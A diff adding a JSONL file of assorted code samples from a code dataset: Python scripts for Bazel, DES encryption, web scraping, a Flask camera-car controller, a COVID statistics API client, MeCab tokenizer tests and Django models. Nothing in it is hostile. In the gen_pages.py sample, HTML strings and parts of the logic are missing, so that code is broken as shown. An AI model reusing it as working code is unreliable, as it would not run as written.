diff --git "a/847.jsonl" "b/847.jsonl" new file mode 100644--- /dev/null +++ "b/847.jsonl" @@ -0,0 +1,631 @@ +{"seq_id":"96690481","text":"#econding=utf8\nimport os\nimport subprocess\nDIR_OF_THIS_SCRIPT = os.path.abspath( os.path.dirname( __file__ ) )\nOUTPUT_SCRIPT='''\nload(\"@hello_server//bazel-compilation-database:aspects.bzl\", \"compilation_database\")\n\ncompilation_database(\n name = \"compiledb\",\n targets = [\n \"//src:hello_server\",\n ],\n'''\n\n\ndef gen_compiledb():\n subprocess.call(\"bazel clean\", shell=True)\n f = open(DIR_OF_THIS_SCRIPT + \"/bazel-compilation-database/BUILD\", 'w+')\n print(OUTPUT_SCRIPT, file=f)\n exec_root = subprocess.check_output([\"bazel\", \"info\", \"execution_root\"]).decode('utf-8').replace('\\n', \"\")\n print(\" exec_root = \" + '\"' + exec_root + '\"' + \",\", file=f)\n print(\")\", file=f)\n f.close()\n subprocess.call(\"bazel build //src:hello_server\", shell=True)\n subprocess.call(\"bazel build //bazel-compilation-database:compiledb\", shell=True)\n subprocess.call(\"cp bazel-bin/bazel-compilation-database/compile_commands.json .\", shell=True)\n\ngen_compiledb()\n","sub_path":".gen_compiledb.py","file_name":".gen_compiledb.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"592937657","text":"from collections import deque\n\nn, m, t = map(int, input().split())\n\ncircles = [0]\n\nfor _ in range(n):\n circles.append(deque(list(map(int, input().split()))))\n\ncommands = []\n\nfor _ in range(t):\n x, d, k = map(int, input().split())\n commands.append((x, d, k))\n\nwhile (commands):\n x, d, k = commands.pop(0)\n for i in range(1, n + 1):\n # x의 배수인 원판만\n if (i % x == 0):\n if (d == 0):\n circles[i].rotate(k)\n else:\n circles[i].rotate(-k)\n\n # 인접수\n zeros = []\n # 1번 원판\n for i in range(m):\n if (i + 1 > m - 1):\n temp = 0\n else:\n temp = i + 1\n\n if (circles[1][i] == circles[1][i - 1] and circles[1][i] != 0):\n zeros.append((1, i))\n if (i - 1 < 0):\n zeros.append((1, m - 1))\n else:\n zeros.append((1, i - 1))\n if (circles[1][i] == circles[1][temp] and circles[1][i] != 0):\n zeros.append((1, i))\n zeros.append((1, temp))\n\n if (circles[1][i] == circles[2][i] and circles[1][i] != 0):\n zeros.append((1, i))\n zeros.append((2, i))\n\n # n번 원판\n for i in range(m):\n if (i + 1 > m - 1):\n temp = 0\n else:\n temp = i + 1\n\n if (circles[n][i] == circles[n][i - 1] and circles[n][i] != 0):\n zeros.append((n, i))\n if (i - 1 < 0):\n zeros.append((n, m - 1))\n else:\n zeros.append((n, i - 1))\n if (circles[n][i] == circles[n][temp] and circles[n][i] != 0):\n zeros.append((n, i))\n zeros.append((n, temp))\n\n if (circles[n][i] == circles[n - 1][i] and circles[n][i] != 0):\n zeros.append((n, i))\n zeros.append((n - 1, i))\n\n for i in range(2, n):\n # 2~n-1번원판\n for j in range(m):\n if (j + 1 > m - 1):\n temp = 0\n else:\n temp = j + 1\n\n if (circles[i][j] == circles[i][j - 1] and circles[i][j] != 0):\n zeros.append((i, j))\n if (j - 1 < 0):\n zeros.append((i, m - 1))\n else:\n zeros.append((i, j - 1))\n if (circles[i][j] == circles[i][temp] and circles[i][j] != 0):\n zeros.append((i, j))\n zeros.append((i, temp))\n if (circles[i][j] == circles[i - 1][j] and circles[i][j] != 0):\n zeros.append((i, j))\n zeros.append((i - 1, j))\n if (circles[i][j] == circles[i + 1][j] and circles[i][j] != 0):\n zeros.append((i, j))\n zeros.append((i + 1, j))\n\n zeros = list(set(zeros))\n\n if (zeros):\n for i in zeros:\n circles[i[0]][i[1]] = 0\n else:\n # 인접수가 없는경우\n sum_temp = 0\n cnt = 0\n for i in range(1, n + 1):\n for j in range(m):\n if (circles[i][j] != 0):\n sum_temp += circles[i][j]\n cnt += 1\n try:\n sum_temp = sum_temp / cnt\n except:\n continue\n\n for i in range(1, n + 1):\n for j in range(m):\n if (circles[i][j] > sum_temp and circles[i][j] != 0):\n circles[i][j] -= 1\n elif (circles[i][j] < sum_temp and circles[i][j] != 0):\n circles[i][j] += 1\n # 각 단계별로 원판 상태출력\n '''\n for i in range(1,n+1):\n print(circles[i])\n print()\n '''\n\nans = 0\nfor i in range(1, n + 1):\n ans += sum(circles[i])\n\nprint(ans)\n","sub_path":"17822_원판 돌리기.py","file_name":"17822_원판 돌리기.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"472945713","text":"import tables\n\n\ndef to_bits(s):\n result = []\n for c in s:\n bits = bin(ord(c))[2:]\n bits = '00000000'[len(bits):] + bits\n result.extend([int(b) for b in bits])\n return result\n\n\ndef from_bits(bits):\n chars = []\n for b in range(int(len(bits) / 8)):\n byte = bits[b * 8:(b + 1) * 8]\n chars.append(chr(int(''.join([str(bit) for bit in byte]), 2)))\n return ''.join(chars)\n\n\ndef apply_permutation(array, permutation):\n result = []\n for p in permutation:\n result.append(array[p - 1])\n return result\n\n\n# input: key = 56 bits\n# output: key = 64 bits\ndef get_extended_key(key):\n result = []\n sum = 0\n for i in range(56):\n result.append(key[i])\n sum += key[i]\n if (i + 1) in [7, 14, 21, 28, 35, 42, 49, 56]:\n result.append(int(sum % 2))\n sum = 0\n return result\n\n\n# input: key = 56 bits\n# output: keys[ {48 bits} ], len = 16 \ndef get_keys(key):\n extended_key = get_extended_key(key)\n result = []\n C = [apply_permutation(extended_key, tables.C0)]\n D = [apply_permutation(extended_key, tables.D0)]\n for i in range(16):\n C.append(C[i].copy())\n D.append(D[i].copy())\n for _ in range(tables.I[i]):\n C[i + 1].append(C[i + 1].pop(0))\n D[i + 1].append(D[i + 1].pop(0))\n new_key = apply_permutation(C[i + 1] + D[i + 1], tables.K)\n result.append(new_key)\n return result\n\n\n# input: string = 8 chars, key = 7 chars\n# output: string = 8 chars\ndef encrypt_block(string, key):\n keys = get_keys(to_bits(key))\n T0 = apply_permutation(to_bits(string), tables.IP)\n L = [T0[:32]]\n R = [T0[32:]]\n for i in range(1, 17):\n # L\n L.append(R[i - 1])\n\n # f1\n _F1 = apply_permutation(R[i - 1], tables.E)\n # f2\n _F2 = []\n for j in range(48):\n _F2.append((_F1[j] + keys[i - 1][j]) % 2)\n # f3\n _F3 = []\n for j in range(8):\n B = _F2[j * 6:(j + 1) * 6]\n a = B[0] * 2 + B[5]\n b = B[1] * 2 ** 3 + B[2] * 2 ** 2 + B[3] * 2 + B[4]\n _F3 += tables.BIN[tables.S[j][a][b]]\n # f4\n _F4 = apply_permutation(_F3, tables.P)\n\n # R\n R.append([])\n for j in range(32):\n R[i].append((L[i - 1][j] + _F4[j]) % 2)\n\n bits_result = apply_permutation(L[16] + R[16], tables.IP_)\n return from_bits(bits_result)\n\n\n# input: string = 8 chars, key = 7 chars\n# output: string = 8 chars\ndef decrypt_block(string, key):\n keys = get_keys(to_bits(key))\n T0 = apply_permutation(to_bits(string), tables.IP)\n L = [T0[:32]]\n R = [T0[32:]]\n for i in range(1, 17):\n # R\n R.append(L[i - 1])\n\n # f1\n _F1 = apply_permutation(L[i - 1], tables.E)\n # f2\n _F2 = []\n for j in range(48):\n _F2.append((_F1[j] + keys[15 - (i - 1)][j]) % 2)\n # f3\n _F3 = []\n for j in range(8):\n B = _F2[j * 6:(j + 1) * 6]\n a = B[0] * 2 + B[5]\n b = B[1] * 2 ** 3 + B[2] * 2 ** 2 + B[3] * 2 + B[4]\n _F3 += tables.BIN[tables.S[j][a][b]]\n # f4\n _F4 = apply_permutation(_F3, tables.P)\n\n # L\n L.append([])\n for j in range(32):\n L[i].append((R[i - 1][j] + _F4[j]) % 2)\n\n bits_result = apply_permutation(L[16] + R[16], tables.IP_)\n return from_bits(bits_result)\n\n\ndef encrypt(string, key):\n key = key[:7]\n while len(string) % 8 != 0:\n string += ' '\n result = \"\"\n for i in range(int(len(string) / 8)):\n result += encrypt_block(string[i * 8:(i + 1) * 8], key)\n return result\n\n\ndef decrypt(string, key):\n key = key[:7]\n while len(string) % 8 != 0:\n string += ' '\n result = \"\"\n for i in range(int(len(string) / 8)):\n result += decrypt_block(string[i * 8:(i + 1) * 8], key)\n return result\n","sub_path":"6term/isob/Lab2/DES.py","file_name":"DES.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"402731922","text":"\nimport sys\nimport time\nimport glob\n\ndef getFileString(file_path):\n file_string = ''\n with open(file_path, 'r') as file_obj:\n file_string = file_obj.read()\n return file_string\n\ndef handleControlSequence(line, i):\n replacement = ''\n\n t_blank = False\n link_text = ''\n link_href = ''\n\n i += 1\n\n # handle text\n if line[i] == '{':\n i += 1\n while line[i] != '}':\n link_text += line[i]\n i += 1\n i += 1\n\n if line[i] == '*':\n t_blank = True\n i += 1\n\n while line[i] != '}':\n link_href += line[i]\n i += 1\n\n if len(link_text) == 0:\n link_text = link_href\n\n replacement = ' 0:\n\n if line.strip().startswith('include:'):\n attr = line.split(':')\n file_path = attr[1].strip()\n new_line += generateHTML(getFileString(file_path))\n new_file_string += new_line + '\\n'\n continue\n elif line.strip().startswith('img:'):\n attr = line.split(':')\n img_path = attr[1].strip()\n height = ''\n if len(attr) > 2:\n height = ' style=\"height: ' + attr[2] + 'px;\"'\n if len(attr) > 3 and 'l' in attr[3]:\n new_line += ''\n else:\n new_line += '
'\n else:\n indentation = ''\n while line[0] == ' ':\n indentation += ' '\n line = line[1:]\n if line[0:2] in ['- ', '+ ', '* ']:\n indentation += ' ' if line[0] == ' ' else line[0]\n line = line[1:]\n while line[0] == ' ':\n indentation += ' '\n line = line[1:]\n\n i = 0\n while i < len(line):\n if line[i:i+2] == ' ':\n new_line += '  '\n i += 1\n elif line[i] == '{':\n append, i = handleControlSequence(line, i)\n new_line += append\n else:\n new_line += line[i]\n i += 1\n\n if len(indentation) > 0:\n new_file_string += '
' + indentation + '' + new_line + '
\\n'\n continue\n\n new_file_string += new_line + '
\\n'\n\n return new_file_string\n\ndef generateHTML_full(file_string):\n new_file_string = ''\n\n # top of html file\n with open('./include/top.html', 'r') as file_obj:\n new_file_string += file_obj.read()\n\n new_file_string += generateHTML(file_string)\n\n # bottom of html file\n with open('./include/bottom.html', 'r') as file_obj:\n new_file_string += file_obj.read()\n\n return new_file_string\n\ndef run():\n txt_files = glob.glob('./*.txt')\n\n for file_path in txt_files:\n\n file_name = file_path.split('/')[-1].split('.')[-2]\n file_string = getFileString(file_path)\n\n new_file_string = generateHTML_full(file_string)\n new_file_path = '../' + file_name + '.html'\n\n with open(new_file_path, 'w') as new_file_obj:\n new_file_obj.write(new_file_string)\n\nif '--dev' in sys.argv:\n print('Running...')\n while True:\n run()\n time.sleep(0.5)\nelse:\n run()","sub_path":"pages_source/gen_pages.py","file_name":"gen_pages.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"446188221","text":"# -*- coding: utf-8 -*-\nimport re\nfrom tutorial.items import TutorialItem\nimport scrapy\n\n\nclass StackoverflowSpider(scrapy.Spider):\n name = 'stackoverflow'\n allowed_domains = ['stackoverflow.com']\n start_urls = ['https://stackoverflow.com/questions?page={}&sort=newest'.format(i)for i in range(1000,1010)]\n\n def parse(self, response):\n for summary in response.css(\".question-summary\"):\n item=TutorialItem()\n desc=summary.css('.excerpt::text').extract_first()\n #把\\r\\n替换掉,并且去除里面的null字符串\n item['desc']=re.sub(r'[\\r\\n]]','',desc).strip()\n # print('Desc:',desc)\n\n item['title']=summary.css('.summary h3 a::text').extract_first()\n # print('Title:',title)\n\n view=summary.css('.views::text').extract_first()\n item['view']=re.sub(r'[^\\d+]','',view)\n # print('User:',view)\n\n # item['start']=summary.css('.summary .started .user-info .user-action-time span::attr(title)').extract_first()\n item['start'] = summary.xpath('/html/body/div[3]/div/div[1]/div[2]/div[1]/div[2]/div[3]/div/div[1]/span/@title').extract_first()\n\n # print('Start time:',start)\n\n item['user']=summary.css('.summary .started .user-info .user-details a::attr(href)').extract_first()\n # print('user:',user)\n\n # item['answer']=summary.css('.summary .stats .statusunanswered strong::text').extract_first()\n item['answer'] = summary.xpath('/html/body/div[3]/div/div[1]/div[2]/div[1]/div[1]/div[2]/div[2]/strong/text()').extract_first()\n # print('answer:',answer)\n\n item['vote']=summary.css('.statscontainer .stats .vote .votes .vote-count-post strong::text').extract_first()\n # print('vote:',vote)\n yield item","sub_path":"tutorial/spiders/stackoverflow.py","file_name":"stackoverflow.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"363856052","text":"#Modified by smartbuilds.io\n#Date: 27.09.20\n#Desc: This web application serves a motion JPEG stream\n# main.py\n# import the necessary packages\nfrom flask import Flask, render_template, Response, request\nfrom car import CarControls\nfrom camera import VideoCamera\nimport time\nimport threading\nimport os\n\nleft = 2\nright = 3\nforward = 4\nbackward = 17\n\nCControl = CarControls(left,right,forward, backward)\n\npi_camera = VideoCamera(flip=True) # flip pi camera if upside down.\n\n# App Globals (do not edit)\napp = Flask(__name__)\n\n@app.route('/stopt', methods=['POST'])\ndef tStop():\n CControl.tStop()\n return('',204)\n\n@app.route('/stopg', methods=['POST'])\ndef gStop():\n CControl.gStop()\n return('',204)\n\n@app.route('/movel', methods=['POST'])\ndef leftTurn():\n CControl.left()\n return('',204)\n\n@app.route('/mover', methods=['POST'])\ndef rightTurn():\n CControl.right()\n return('',204)\n\n@app.route('/movef', methods=['POST'])\ndef foward():\n CControl.forward()\n return('',204)\n\n@app.route('/moveb', methods=['POST'])\ndef backward():\n CControl.backward()\n return('',204)\n\n@app.route('/moves', methods=['POST'])\ndef stop():\n CControl.stop()\n return('',204)\n\n@app.route('/')\ndef index():\n return render_template('index.html', carC = CControl) #you can customze index.html here\n\ndef gen(camera):\n #get camera frame\n while True:\n frame = camera.get_frame()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n\\r\\n')\n\n@app.route('/video_feed')\ndef video_feed():\n return Response(gen(pi_camera),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\nif __name__ == '__main__':\n\n app.run(host='0.0.0.0', debug=False)\n \n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"316585099","text":"import json\nimport os\nimport requests\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\n\n\"\"\"\nThis module contains the interface class used by the \nCorona Spread feature, making an API request to the\nCorona Monitor API, which is hosted at Rapid Api and\ncan be found here:\n\nhttps://rapidapi.com/astsiatsko/api/coronavirus-monitor/\n\"\"\"\n\n\nclass ApiHandle:\n\t\"\"\"\n\tCall api and parse output to JSON. Returns cache \n\tunless the data over 2 hours old by default as to not \n\toverload the api service. The object calls the api upon\n\tinstantiation, and will automatically cache the response.\n\n\t:uri:\n\t\tURI for the REST api\n\n\t:_last_api_call:\n\t\tdatetime stamp for when data was most recently fetched\n\t\tfrom the api, used to return cache within the defined\n\t\tspan upon construction, minmum 0 hours.\n\n\t:_wait_time:\n\t\tseconds calculated by the defined standby_hours parameter\n\n\t:_cached_response:\n\t\tlast response received by the API\n\n\t:_headers_:\n\t\tdictionary which can be added to with the add_header method.\n\t\tContains headers which will be used upon a request with the \n\t\tfetch() call.\n\t\"\"\"\n\n\tdef __init__(self, uri: str, standby_hours = 2):\n\t\tself.uri: str = uri\n\t\tself.last_api_call: datetime = None\n\t\tself._wait_time = (60 * 60) * standby_hours\n\t\tself._cached_response = None\n\t\tself._cached_response: dict = None\n\t\tself._headers = {}\n\n\t@property\n\tdef uri(self) -> str:\n\t\treturn self._uri\n\t\n\t@uri.setter\n\tdef uri(self, uri: str) -> None:\n\t\tif uri.startswith('https'):\n\t\t\tself._uri = uri\n\t\telse:\n\t\t\traise AttributeError('Got \"http\", expected \"https\"')\n\t\n\t@property\n\tdef last_api_call(self) -> str:\n\t\t\"\"\"\n\t\tReturn property in string format for easy readability\n\t\tfor users.\n\t\t\"\"\"\n\t\treturn self._last_api_call.strftime(\"%Y-%m-%d %H:%M\")\n\n\t@last_api_call.setter\n\tdef last_api_call(self, val: datetime) -> None:\n\t\tself._last_api_call = val\n\n\tdef add_header(self, key: str, value: str) -> None:\n\t\t\"\"\"\n\t\tAllows this object to add HTML headers for the \n\t\trequest. The method is meant to be used prior to\n\t\ta call for an API which requires headers to work.\n\n\t\t:param key:\n\t\t\tstr\n\t\t\tthe key in the header, example: 'User-Agent'\n\t\t:param vaue:\n\t\t\tstr\n\t\t\tThe value behind said key.\n\t\t:returns:\n\t\t\tNone\n\t\t\"\"\"\n\t\tself._headers[key] = value\n\n\tdef fetch(self) -> dict:\n\t\t\"\"\"\n\t\tCall the api and mutate the instance variable _cached_response\n\t\tat the same time, if either none prior were made or the time \n\t\texpired and it needs to be refreshed. \n\n\t\t:returns:\n\t\t\tdict\n\t\t\"\"\"\n\t\tif self._cached_response:\n\t\t\tseconds_since_last_call = (datetime.now() - self._last_api_call).seconds\n\t\t\tif seconds_since_last_call < self._wait_time: \n\t\t\t\treturn self._cached_response\n\t\ttry:\n\t\t\tresponse = requests.get(self.uri, headers = self._headers).json()\n\t\texcept Exception:\n\t\t\traise\n\t\t\n\t\tself._cached_response = response\n\t\tself.last_api_call = datetime.now()\n\t\treturn response\n\n\nclass Client:\n\t\"\"\"\n\tAct as the interface from the retreived data \n\tby an instance of the ApiHandle class.\n\n\tReturn infections by country, mortalities,\n\trecoveries based upon method call.\n\t\"\"\"\n\n\tdef __init__(self, api_handle: ApiHandle, translation_file_path: str):\n\t\tself.api_handle = api_handle\n\t\tself.translation_file_path = translation_file_path\n\n\tdef _translate(self, country: str, from_language: str) -> str:\n\t\t\"\"\"\n\t\tReturn the value behind key country parameter\n\t\twhich is the swedish translated string of given\n\t\tcountry.\n\t\t:param country:\n\t\t\tstring, country to translate\n\t\t:param from_language:\n\t\t\tstring, from which language. Either Swedish to English or vice versa.\n\t\t:returns:\n\t\t\tstring\n\t\t\"\"\"\n\t\tcountry = country.lower()\n\t\ttry:\n\t\t\twith open(self.translation_file_path, 'r', encoding = 'utf-8') as f:\n\t\t\t\ttranslation = json.loads(f.read())\n\t\texcept Exception as e:\n\t\t\traise Exception(f'Could not load translation file. {e}')\n\t\t\n\t\tif from_language == 'swedish':\n\t\t\treturn translation['swe_to_eng'][country]\n\t\treturn translation['eng_to_swe'][country]\n\n\tdef get_raw_data(self):\n\t\t\"\"\"\n\t\tReturns the raw api return without any parsing.\n\t\tfor debugging.\n\t\t\"\"\"\n\t\treturn self.api_handle.fetch()\n\n\tdef get_total_recoveries(self) -> int:\n\t\tdata = self.api_handle.fetch()['countries_stat']\n\t\treturn sum([int(i['total_recovered'].replace(',','')) for i in data])\n\n\tdef get_total_infections(self) -> int:\n\t\tdata = self.api_handle.fetch()['countries_stat']\n\t\treturn sum([int(i['cases'].replace(',','')) for i in data])\n\n\tdef get_total_deaths(self, sort_by_highest = True) -> str:\n\t\tdata = self.api_handle.fetch()['countries_stat']\n\t\treturn sum([int(i['deaths'].replace(',','')) for i in data])\n\n\tdef get_recoveries(self, sort_by_highest = True) -> str:\n\t\tsorter = lambda i: int(i['total_recovered'].replace(',',''))\n\t\tdata = self.api_handle.fetch()['countries_stat']\n\t\tdata.sort(key = sorter, reverse = sort_by_highest)\n\t\ttranslated_country = self._translate(data[0]['country_name'], 'english')\n\t\treturn f\"{translated_country}: {data[0]['total_recovered']}\"\n\n\tdef get_infections(self, sort_by_highest = True) -> str:\n\t\tsorter = lambda i: int(i['cases'].replace(',',''))\n\t\tdata = self.api_handle.fetch()['countries_stat']\n\t\tdata.sort(key = sorter, reverse = sort_by_highest)\n\t\ttranslated_country = self._translate(data[0]['country_name'], 'english')\n\t\treturn f\"{translated_country}: {data[0]['cases']}\"\n\n\tdef get_deaths(self, sort_by_highest = True) -> str:\n\t\tsorter = lambda i: int(i['deaths'].replace(',',''))\n\t\tdata = self.api_handle.fetch()['countries_stat']\n\t\tdata.sort(key = sorter, reverse = sort_by_highest)\n\t\ttranslated_country = self._translate(data[0]['country_name'], 'english')\n\t\treturn f\"{translated_country}: {data[0]['deaths']}\"\t\n\n\tdef get_by_query(self, query: str, country_name: str) -> str:\n\t\t\"\"\"\n\t\tGet details on a country depending on query.\n\t\t:param data:\n\t\t\tstring representing deaths, recoveries or cases. These are:\n\t\t\t- 'cases'\n\t\t\t- 'recovered'\n\t\t\t- 'deaths'\n\t\t:param country: \n\t\t\tstring represenging country for lookup.\n\t\t:returns:\n\t\t\tstring\n\t\t\"\"\"\n\n\t\tdata = self.api_handle.fetch()['countries_stat']\n\t\tfor country in data:\n\t\t\tif country['country_name'].lower() == self._translate(country_name, 'swedish'):\n\t\t\t\treturn country[query]\n\t\traise KeyError(f'No such key: {country_name}')\n\n\tdef get_data_timestamp(self) -> str:\n\t\t\"\"\"\n\t\tReturns the datetime string under 'statistic_taken_at' key\n\t\tin response body from the API. This indicates when the\n\t\tstatistics were taken, thus how old the data is.\n\t\t:returns:\n\t\t\tstring, datetime\n\t\t\"\"\"\n\t\treturn self.api_handle.fetch()['statistic_taken_at']","sub_path":"source/coronafeatureclient.py","file_name":"coronafeatureclient.py","file_ext":"py","file_size_in_byte":6458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"435823156","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nimport unittest\nimport operator\nimport sys\nimport os.path\nsys.path.append(os.path.abspath('..'))\nfrom mecab.writer import WordInfo\nfrom mecab import partofspeech as PoS\nfrom textproc.dataloader import getDataLoader\nfrom textproc.sentenceparser import MecabSentenceParser, PyPortSentenceParser\n\nclass SentenceParserTest(unittest.TestCase):\n def setUp(self):\n self.pyparser = PyPortSentenceParser(getDataLoader())\n self.exeparser = MecabSentenceParser()\n\n def testExeSimple(self):\n res = self.exeparser.tokenize('ですからあの人')\n expected = [WordInfo('ですから', 0, 'ですから', PoS.CONJ, 'デスカラ'),\n WordInfo('あの', 4, 'あの', PoS.FILLER, 'アノ'),\n WordInfo('人', 6, '人' ,PoS.NOUN, 'ヒト')]\n self.assertEquals(expected, res)\n\n def testPySimple(self):\n res = self.pyparser.tokenize('ですからあの人')\n expected = [WordInfo('ですから', 0, 'ですから', PoS.CONJ, 'デスカラ'),\n WordInfo('あの', 4, 'あの', PoS.FILLER, 'アノ'),\n WordInfo('人', 6, '人' ,PoS.NOUN, 'ヒト')]\n self.assertEquals(expected, res)\n\n\n def testMecabFailure(self):\n \"\"\"\n A test where Mecab fails to recognize the verb 滲み込む\n \"\"\"\n result = self.exeparser.tokenize('すべてに滲み込み')\n result = list(map(operator.attrgetter('dictionaryForm'), result))\n self.assertEquals(['すべて', 'に', '滲みる', '込み'], result)\n\n def testPyPort(self):\n result = self.pyparser.tokenize('所に着いたのは')\n result = list(map(operator.attrgetter('word'), result))\n self.assertEquals(['所', 'に', '着い', 'た', 'の', 'は'], result)\n\n def testWhiteSpace(self):\n result = self.pyparser.tokenize('\\n所に着いたのは')\n result = list(map(operator.attrgetter('word'), result))\n self.assertEquals(['所', 'に', '着い', 'た', 'の', 'は'], result)\n\n def testNumericKanji(self):\n result = self.pyparser.tokenize('一列縦隊')\n result = list(map(operator.attrgetter('word'), result))\n self.assertEquals(['一', '列', '縦隊'], result)\n\n def testUnicodeErrorInString(self):\n result = self.pyparser.tokenize('ドンキ-・バー')\n result = list(map(operator.attrgetter('word'), result))\n self.assertEquals(['ドンキ', '-', '・', 'バー'], result)\n\n\n\n def testTokenizeNum(self):\n \"\"\"\n ~\n \"\"\"\n result = self.pyparser.tokenize('九~九')\n result = list(map(operator.attrgetter('word'), result))\n self.assertEquals(['九', '~', '九'], result)\n\n def testWhiteSpaceInside(self):\n result = self.pyparser.tokenize('\\n船が検 疫所に\\n')\n words = list(map(operator.attrgetter('word'), result))\n self.assertEquals(['船', 'が', '検', '疫所', 'に'], words)\n positions = list(map(operator.attrgetter('startPos'), result))\n self.assertEquals([1, 2, 3, 5, 7], positions)\n\n def testTokenize2(self):\n res = self.pyparser.tokenize('所に着いたのは')\n expected = [ WordInfo('所', 0, '所', PoS.NOUN, 'トコロ'),\n WordInfo('に', 1, 'に', PoS.PRT_CASE, 'ニ'),\n WordInfo('着い', 2, '着く', PoS.VERB, 'ツイ'),\n WordInfo('た', 4, 'た', PoS.VERB_AUX, 'タ'),\n WordInfo('の', 5, 'の', PoS.NOUN_NONIND, 'ノ'),\n WordInfo('は', 6, 'は', PoS.PRT_BIND, 'ハ')\n ]\n self.assertEquals(expected, res)\n\n def testUnknownWord(self):\n res = self.pyparser.tokenize('デッキに昇って行った')\n expected = [ WordInfo('デッキ', 0, 'デッキ', PoS.NOUN, 'デッキ'),\n WordInfo('に', 3, 'に', PoS.PRT_CASE, 'ニ')\n ]\n self.assertEquals(expected, res[0:2])\n\n def testComma(self):\n result = self.pyparser.tokenize('や、船客')\n result = list(map(operator.attrgetter('word'), result))\n self.assertEqual(['や', '、', '船客'], result)\n\n def testUnkUnk(self):\n result = self.pyparser.tokenize('はっぴー・ばれん')\n result = list(map(operator.attrgetter('word'), result))\n self.assertEqual(['はっぴ', 'ー', '・', 'ばれ','ん'], result)\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(SentenceParserTest)\n unittest.TextTestRunner(verbosity=2).run(suite)","sub_path":"tests/test_sentenceparser.py","file_name":"test_sentenceparser.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"467954910","text":"\n\n#calss header\nclass _TRIBUNE():\n\tdef __init__(self,): \n\t\tself.name = \"TRIBUNE\"\n\t\tself.definitions = [u'used in the titles of some newspapers: ', u\"in ancient Rome, an elected official whose job was to protect people's rights\"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_tribune.py","file_name":"_tribune.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"195027521","text":"from ckeditor.fields import RichTextField\nfrom django.db import models\nfrom blog_website.utils.models import BaseModel\nfrom user.models import User\n\n\nclass ArticleCategory(BaseModel):\n \"\"\"文章分类\"\"\"\n name = models.CharField(max_length=10, verbose_name='名称', help_text='不超过10个字')\n parent = models.ForeignKey('self', null=True, blank=True, related_name='subs',\n on_delete=models.CASCADE, verbose_name='父类别')\n describe = models.CharField(max_length=100, default='', verbose_name='类别描述', help_text='不超过100个字')\n image_url = models.CharField(max_length=1000, null=True, verbose_name='类别图片')\n\n class Meta:\n db_table = 'article_category'\n verbose_name = '文章分类'\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return self.name\n\n\nclass Article(BaseModel):\n \"\"\"文章\"\"\"\n author = models.ForeignKey(User, null=True, blank=True,\n on_delete=models.CASCADE, verbose_name='作者')\n title = models.CharField(max_length=50, verbose_name='标题', help_text='b不超过50字')\n content = RichTextField(verbose_name='内容')\n category1 = models.ForeignKey(ArticleCategory, on_delete=models.PROTECT,\n related_name='cat1', verbose_name='一级分类')\n category2 = models.ForeignKey(ArticleCategory, on_delete=models.PROTECT,\n related_name='cat2', verbose_name='二级分类')\n read_count = models.IntegerField(default=0, verbose_name='阅读量')\n index_image = models.CharField(max_length=1000, null=True, verbose_name='文章主图')\n is_top = models.BooleanField(default=False, verbose_name='是否置顶')\n like_count = models.IntegerField(default=0, verbose_name='点赞数')\n describe = models.TextField(default='', verbose_name='文章描述', help_text='用于列表页展示文章简介')\n labels = models.ManyToManyField('Label', verbose_name='文章标签')\n\n class Meta:\n db_table = 'article'\n verbose_name = '文章'\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return self.title\n\n\nclass Label(BaseModel):\n \"\"\"文章标签\"\"\"\n name = models.CharField(max_length=20, verbose_name='文章标签', help_text='不超过20个字')\n\n class Meta:\n db_table = 'label'\n verbose_name = '标签'\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return self.name\n","sub_path":"blog_website/blog_website/apps/article/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"327699407","text":"import tensorflow as tf\n\n\"\"\"\na=tf.Variable(0)\nb=tf.Variable(1)\nc=tf.add(a,b)\n\nupdate1=tf.assign(a,tf.add(a,b))\nupdate2=tf.assign(a,tf.add(a,c))\nupdate3=tf.assign(b,tf.add(a,b))\nupdate4=tf.assign(b,tf.add(c,b))\n#update5=tf.assign(c,tf.add(a,c))\n#update6=tf.assign(c,tf.add(c,b))\nsess=tf.Session()\ninit_op=tf.initialize_all_variables()\nsess.run(init_op)\n\nsess.run(update1)\nprint(sess.run([a,b,c]))\nsess.run(update2)\nprint(sess.run([a,b,c]))\nsess.run(update3)\nprint(sess.run([a,b,c]))\nsess.run(update4)\nprint(sess.run([a,b,c]))\n\nsess.close()\n\"\"\"\nweights=tf.Variable(tf.random_normal([7,2],stddev=0.35),name=\"weights0\")\nbiases=tf.Variable(tf.zeros([200]),name=\"biases0\")\n# Create another variable with the same value as 'weights'.\nw2 = 